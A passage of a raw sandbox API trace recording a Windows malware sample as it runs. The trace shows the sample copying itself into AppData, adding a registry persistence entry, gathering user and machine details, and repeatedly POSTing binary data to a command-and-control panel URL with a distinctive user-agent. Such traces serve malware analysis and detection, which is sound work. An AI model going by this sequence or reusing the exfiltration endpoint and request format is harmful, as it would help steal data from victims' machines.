LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0137.312] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18fb68, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18fb70 | out: pSid=0x18fb70*=0x594708*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0137.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0137.313] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x594708*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18fb74 | out: IsMember=0x18fb74) returned 1 [0137.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0137.314] GetNativeSystemInfo (in: lpSystemInfo=0x18fb4c | out: lpSystemInfo=0x18fb4c*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0137.314] CryptAcquireContextW (in: phProv=0x18f928, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x18f928*=0x0) returned 1 [0137.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0137.318] CryptAcquireContextW (in: phProv=0x18f928, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x18f928*=0x58ed80) returned 1 [0137.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0137.323] CryptSetKeyParam (hKey=0x58a580, dwParam=0x4, pbData=0x18f924*=0x1, dwFlags=0x0) returned 1 [0137.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0137.324] CryptSetKeyParam (hKey=0x58a580, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0137.324] CryptDecrypt (in: hKey=0x58a580, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x57a600, pdwDataLen=0x18f97c | out: pbData=0x57a600, pdwDataLen=0x18f97c) returned 1 [0137.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0137.325] CryptDestroyKey (hKey=0x58a580) returned 1 [0137.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0137.325] CryptReleaseContext (hProv=0x58ed80, dwFlags=0x0) returned 1 [0137.326] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x94\x9b\x90\x8b\x8d\x9e\x94\x86Ñ\x9c\x90\x92Ð\x8b\x9a\x92\x8fЯ\x9e\x91\x9a\x93Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0137.326] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0137.326] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x94\x9b\x90\x8b\x8d\x9e\x94\x86Ñ\x9c\x90\x92Ð\x8b\x9a\x92\x8fЯ\x9e\x91\x9a\x93Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0137.327] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0137.327] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x94\x9b\x90\x8b\x8d\x9e\x94\x86Ñ\x9c\x90\x92Ð\x8b\x9a\x92\x8fЯ\x9e\x91\x9a\x93Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0137.327] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0137.327] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x94\x9b\x90\x8b\x8d\x9e\x94\x86Ñ\x9c\x90\x92Ð\x8b\x9a\x92\x8fЯ\x9e\x91\x9a\x93Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0137.327] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x94\x9b\x90\x8b\x8d\x9e\x94\x86Ñ\x9c\x90\x92Ð\x8b\x9a\x92\x8fЯ\x9e\x91\x9a\x93Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x18f938*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x18f958 | out: ppResult=0x18f958*=0x0) returned 11004 [0137.338] CryptAcquireContextW (in: phProv=0x18f928, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x18f928*=0x0) returned 1 [0137.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0137.341] CryptAcquireContextW (in: phProv=0x18f928, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x18f928*=0x58ed80) returned 1 [0137.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0137.346] CryptSetKeyParam (hKey=0x58a580, dwParam=0x4, pbData=0x18f924*=0x1, dwFlags=0x0) returned 1 [0137.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0137.347] CryptSetKeyParam (hKey=0x58a580, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0137.347] CryptDecrypt (in: hKey=0x58a580, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x57a600, pdwDataLen=0x18f97c | out: pbData=0x57a600, pdwDataLen=0x18f97c) returned 1 [0137.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0137.348] CryptDestroyKey (hKey=0x58a580) returned 1 [0137.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0137.348] CryptReleaseContext (hProv=0x58ed80, dwFlags=0x0) returned 1 [0137.349] StrStrA (lpFirst="http://kdotraky.com/temp/Panel/five/fre.php", lpSrch="http://") returned="http://kdotraky.com/temp/Panel/five/fre.php" [0137.349] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0137.349] StrStrA (lpFirst="kdotraky.com/temp/Panel/five/fre.php", lpSrch="/") returned="/temp/Panel/five/fre.php" [0137.350] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0137.350] StrStrA (lpFirst="kdotraky.com/temp/Panel/five/fre.php", lpSrch=":") returned 0x0 [0137.350] getaddrinfo (in: pNodeName="kdotraky.com", pServiceName="80", pHints=0x18f938*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x18f958 | out: ppResult=0x18f958*=0x595b50*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x594708*(sa_family=2, sin_port=0x50, sin_addr="101.99.75.184"), ai_next=0x0)) returned 0 [0137.355] socket (af=2, type=1, protocol=6) returned 0x190 [0137.355] connect (s=0x190, name=0x594708*(sa_family=2, sin_port=0x50, sin_addr="101.99.75.184"), namelen=16) returned 0 [0137.554] FreeAddrInfoW (pAddrInfo=0x595b50*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x594708*(sa_family=2, sin_port=0x50, sin_addr="101.99.75.184"), ai_next=0x0)) [0137.554] wvsprintfA (in: param_1=0x597310, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x18f960 | out: param_1="POST /temp/Panel/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: kdotraky.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 183 [0137.555] wvsprintfA (in: param_1=0x597310, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x18f960 | out: param_1="POST /temp/Panel/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: kdotraky.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 1B8D0678\r\nContent-Length: 194\r\nConnection: close\r\n\r\n") returned 248 [0137.555] send (in: s=0x190, buf=0x594dd0*, len=248, flags=0 | out: buf=0x594dd0*) returned 248 [0137.555] send (in: s=0x190, buf=0x58d9f0*, len=194, flags=0 | out: buf=0x58d9f0*) returned 194 [0137.555] recv (in: s=0x190, buf=0x597310, len=4048, flags=0 | out: buf=0x597310*) returned 179 [0138.114] closesocket (s=0x190) returned 0 [0138.116] StrStrW (lpFirst="C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe", lpSrch="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\98E541\\12EEF2.exe") returned 0x0 [0138.117] MoveFileExW (lpExistingFileName="C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe" (normalized: "c:\\users\\kft6utqw\\appdata\\local\\temp\\heidi.exe"), lpNewFileName="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\98E541\\12EEF2.exe" (normalized: "c:\\users\\kft6utqw\\appdata\\roaming\\98e541\\12eef2.exe"), dwFlags=0x1) returned 1 [0138.120] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18fd04, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18fd0c | out: pSid=0x18fd0c*=0x574448*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0138.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0138.121] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x574448*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18fd10 | out: IsMember=0x18fd10) returned 1 [0138.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0138.122] CryptAcquireContextW (in: phProv=0x18fc9c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x18fc9c*=0x0) returned 1 [0138.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0138.125] CryptAcquireContextW (in: phProv=0x18fc9c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x18fc9c*=0x57b848) returned 1 [0138.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0138.129] CryptSetKeyParam (hKey=0x58ee90, dwParam=0x4, pbData=0x18fc98*=0x1, dwFlags=0x0) returned 1 [0138.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0138.130] CryptSetKeyParam (hKey=0x58ee90, dwParam=0x1, pbData=0x418844, dwFlags=0x0) returned 1 [0138.130] CryptDecrypt (in: hKey=0x58ee90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x596390, pdwDataLen=0x18fcf0 | out: pbData=0x596390, pdwDataLen=0x18fcf0) returned 1 [0138.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0138.131] CryptDestroyKey (hKey=0x58ee90) returned 1 [0138.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0138.131] CryptReleaseContext (hProv=0x57b848, dwFlags=0x0) returned 1 [0138.132] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x596390, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0138.132] SHRegSetPathW (hKey=0x80000001, pcszSubKey="������Д�������ќ��Ћ���Я����Й���Й��я��", pcszValue="98E541", pcszPath="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\98E541\\12EEF2.exe", dwFlags=0x0) returned 0x0 [0138.135] GetUserNameW (in: lpBuffer=0x594dd0, pcbBuffer=0x18fed8 | out: lpBuffer="kFT6uTQW", pcbBuffer=0x18fed8) returned 1 [0138.135] GetComputerNameW (in: lpBuffer=0x594dd0, nSize=0x18fed8 | out: lpBuffer="XABNCPUWKW", nSize=0x18fed8) returned 1 [0138.136] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x18fed8 | out: TokenHandle=0x18fed8*=0x0) returned 0 [0138.136] GetLastError () returned 0x3f0 [0138.136] GetCurrentProcess () returned 0xffffffff [0138.137] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0138.137] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fed8 | out: TokenHandle=0x18fed8*=0x17c) returned 1 [0138.138] GetTokenInformation (in: TokenHandle=0x17c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18fed4 | out: TokenInformation=0x0, ReturnLength=0x18fed4) returned 0 [0138.138] GetTokenInformation (in: TokenHandle=0x17c, TokenInformationClass=0x1, TokenInformation=0x5857b0, TokenInformationLength=0x24, ReturnLength=0x18fed4 | out: TokenInformation=0x5857b0, ReturnLength=0x18fed4) returned 1 [0138.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0138.139] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x5857b8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x87)), Name=0x594dd0, cchName=0x18fec4, ReferencedDomainName=0x57bb10, cchReferencedDomainName=0x18fec8, peUse=0x18fec0 | out: Name="kFT6uTQW", cchName=0x18fec4, ReferencedDomainName="XABNCPUWKW", cchReferencedDomainName=0x18fec8, peUse=0x18fec0) returned 1 [0138.140] GetDesktopWindow () returned 0x10010 [0138.141] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0138.141] GetWindowRect (in: hWnd=0x10010, lpRect=0x18fed0 | out: lpRect=0x18fed0) returned 1 [0138.141] GetUserNameW (in: lpBuffer=0x18fcd0, pcbBuffer=0x18fed8 | out: lpBuffer="kFT6uTQW", pcbBuffer=0x18fed8) returned 1 [0138.142] LoadLibraryW (lpLibFileName="NETAPI32") returned 0x75510000 [0138.142] GetProcAddress (hModule=0x75510000, lpProcName="NetUserGetInfo") returned 0x754c1be2 [0138.142] NetUserGetInfo (in: servername=0x0, username="kFT6uTQW", level=0x1, bufptr=0x18fedc | out: bufptr=0x58ee90*(usri1_name="kFT6uTQW", usri1_password=0x0, usri1_password_age=0x13fe51d, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0138.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0138.145] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18fec8, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18fed0 | out: pSid=0x18fed0*=0x594708*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0138.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0138.145] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x594708*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18fed4 | out: IsMember=0x18fed4) returned 1 [0138.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0138.146] GetNativeSystemInfo (in: lpSystemInfo=0x18feac | out: lpSystemInfo=0x18feac*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0138.146] CryptAcquireContextW (in: phProv=0x18fcb0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x18fcb0*=0x0) returned 1 [0138.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0138.150] CryptAcquireContextW (in: phProv=0x18fcb0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x18fcb0*=0x5959a0) returned 1 [0138.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0138.154] CryptSetKeyParam (hKey=0x594590, dwParam=0x4, pbData=0x18fcac*=0x1, dwFlags=0x0) returned 1 [0138.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0138.155] CryptSetKeyParam (hKey=0x594590, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0138.155] CryptDecrypt (in: hKey=0x594590, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x57a600, pdwDataLen=0x18fd04 | out: pbData=0x57a600, pdwDataLen=0x18fd04) returned 1 [0138.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0138.156] CryptDestroyKey (hKey=0x594590) returned 1 [0138.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0138.156] CryptReleaseContext (hProv=0x5959a0, dwFlags=0x0) returned 1 [0138.157] StrStrA (lpFirst="http://kdotraky.com/temp/Panel/five/fre.php", lpSrch="http://") returned="http://kdotraky.com/temp/Panel/five/fre.php" [0138.157] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0138.157] StrStrA (lpFirst="kdotraky.com/temp/Panel/five/fre.php", lpSrch="/") returned="/temp/Panel/five/fre.php" [0138.158] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0138.158] StrStrA (lpFirst="kdotraky.com/temp/Panel/five/fre.php", lpSrch=":") returned 0x0 [0138.158] getaddrinfo (in: pNodeName="kdotraky.com", pServiceName="80", pHints=0x18fcc0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x18fce0 | out: ppResult=0x18fce0*=0x595d30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x594708*(sa_family=2, sin_port=0x50, sin_addr="101.99.75.184"), ai_next=0x0)) returned 0 [0138.158] socket (af=2, type=1, protocol=6) returned 0x190 [0138.158] connect (s=0x190, name=0x594708*(sa_family=2, sin_port=0x50, sin_addr="101.99.75.184"), namelen=16) returned 0 [0138.368] FreeAddrInfoW (pAddrInfo=0x595d30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x594708*(sa_family=2, sin_port=0x50, sin_addr="101.99.75.184"), ai_next=0x0)) [0138.369] wvsprintfA (in: param_1=0x597310, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x18fce8 | out: param_1="POST /temp/Panel/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: kdotraky.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 183 [0138.370] wvsprintfA (in: param_1=0x597310, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x18fce8 | out: param_1="POST /temp/Panel/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: kdotraky.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 1B8D0678\r\nContent-Length: 167\r\nConnection: close\r\n\r\n") returned 248 [0138.370] send (in: s=0x190, buf=0x57c310*, len=248, flags=0 | out: buf=0x57c310*) returned 248 [0138.370] send (in: s=0x190, buf=0x57b848*, len=167, flags=0 | out: buf=0x57b848*) returned 167 [0138.370] recv (in: s=0x190, buf=0x58d9f0, len=4048, flags=0 | out: buf=0x58d9f0*) returned 157 [0138.821] closesocket (s=0x190) returned 0 [0198.834] CryptAcquireContextW (in: phProv=0x18fcb0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x18fcb0*=0x0) returned 1 [0198.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0198.838] CryptAcquireContextW (in: phProv=0x18fcb0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x18fcb0*=0x57e800) returned 1 [0198.843] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0198.843] CryptSetKeyParam (hKey=0x594fe0, dwParam=0x4, pbData=0x18fcac*=0x1, dwFlags=0x0) returned 1 [0198.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0198.844] CryptSetKeyParam (hKey=0x594fe0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.844] CryptDecrypt (in: hKey=0x594fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x57a498, pdwDataLen=0x18fd04 | out: pbData=0x57a498, pdwDataLen=0x18fd04) returned 1 [0198.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0198.845] CryptDestroyKey (hKey=0x594fe0) returned 1 [0198.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0198.845] CryptReleaseContext (hProv=0x57e800, dwFlags=0x0) returned 1 [0198.846] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x94\x9b\x90\x8b\x8d\x9e\x94\x86Ñ\x9c\x90\x92Ð\x8b\x9a\x92\x8fЯ\x9e\x91\x9a\x93Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0198.846] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0198.846] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x94\x9b\x90\x8b\x8d\x9e\x94\x86Ñ\x9c\x90\x92Ð\x8b\x9a\x92\x8fЯ\x9e\x91\x9a\x93Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0198.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0198.847] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x94\x9b\x90\x8b\x8d\x9e\x94\x86Ñ\x9c\x90\x92Ð\x8b\x9a\x92\x8fЯ\x9e\x91\x9a\x93Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0198.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0198.848] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x94\x9b\x90\x8b\x8d\x9e\x94\x86Ñ\x9c\x90\x92Ð\x8b\x9a\x92\x8fЯ\x9e\x91\x9a\x93Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0198.848] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x94\x9b\x90\x8b\x8d\x9e\x94\x86Ñ\x9c\x90\x92Ð\x8b\x9a\x92\x8fЯ\x9e\x91\x9a\x93Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x18fcc0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x18fce0 | out: ppResult=0x18fce0*=0x0) returned 11004 [0198.848] CryptAcquireContextW (in: phProv=0x18fcb0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x18fcb0*=0x0) returned 1 [0198.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0198.851] CryptAcquireContextW (in: phProv=0x18fcb0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x18fcb0*=0x57e800) returned 1 [0198.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0198.856] CryptSetKeyParam (hKey=0x594fe0, dwParam=0x4, pbData=0x18fcac*=0x1, dwFlags=0x0) returned 1 [0198.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0198.857] CryptSetKeyParam (hKey=0x594fe0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.857] CryptDecrypt (in: hKey=0x594fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x57a498, pdwDataLen=0x18fd04 | out: pbData=0x57a498, pdwDataLen=0x18fd04) returned 1 [0198.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0198.857] CryptDestroyKey (hKey=0x594fe0) returned 1 [0198.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77330000 [0198.858] CryptReleaseContext (hProv=0x57e800, dwFlags=0x0) returned 1 [0198.858] StrStrA (lpFirst="http://kdotraky.com/temp/Panel/five/fre.php", lpSrch="http://") returned="http://kdotraky.com/temp/Panel/five/fre.php" [0198.859] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0198.859] StrStrA (lpFirst="kdotraky.com/temp/Panel/five/fre.php", lpSrch="/") returned="/temp/Panel/five/fre.php" [0198.859] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0198.859] StrStrA (lpFirst="kdotraky.com/temp/Panel/five/fre.php", lpSrch=":") returned 0x0 [0198.859] getaddrinfo (in: pNodeName="kdotraky.com", pServiceName="80", pHints=0x18fcc0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x18fce0 | out: ppResult=0x18fce0*=0x595d08*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5830c0*(sa_family=2, sin_port=0x50, sin_addr="101.99.75.184"), ai_next=0x0)) returned 0 [0198.860] socket (af=2, type=1, protocol=6) returned 0x18c [0198.860] connect (s=0x18c, name=0x5830c0*(sa_family=2, sin_port=0x50, sin_addr="101.99.75.184"), namelen=16) returned 0 [0199.059] FreeAddrInfoW (pAddrInfo=0x595d08*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5830c0*(sa_family=2, sin_port=0x50, sin_addr="101.99.75.184"), ai_next=0x0)) [0199.060] wvsprintfA (in: param_1=0x597310, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x18fce8 | out: param_1="POST /temp/Panel/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: kdotraky.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 183 [0199.061] wvsprintfA (in: param_1=0x597310, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x18fce8 | out: param_1="POST /temp/Panel/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: kdotraky.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 1B8D0678\r\nContent-Length: 167\r\nConnection: close\r\n\r\n") returned 248 [0199.061] send (in: s=0x18c, buf=0x586a20*, len=248, flags=0 | out: buf=0x586a20*) returned 248 [0199.061] send (in: 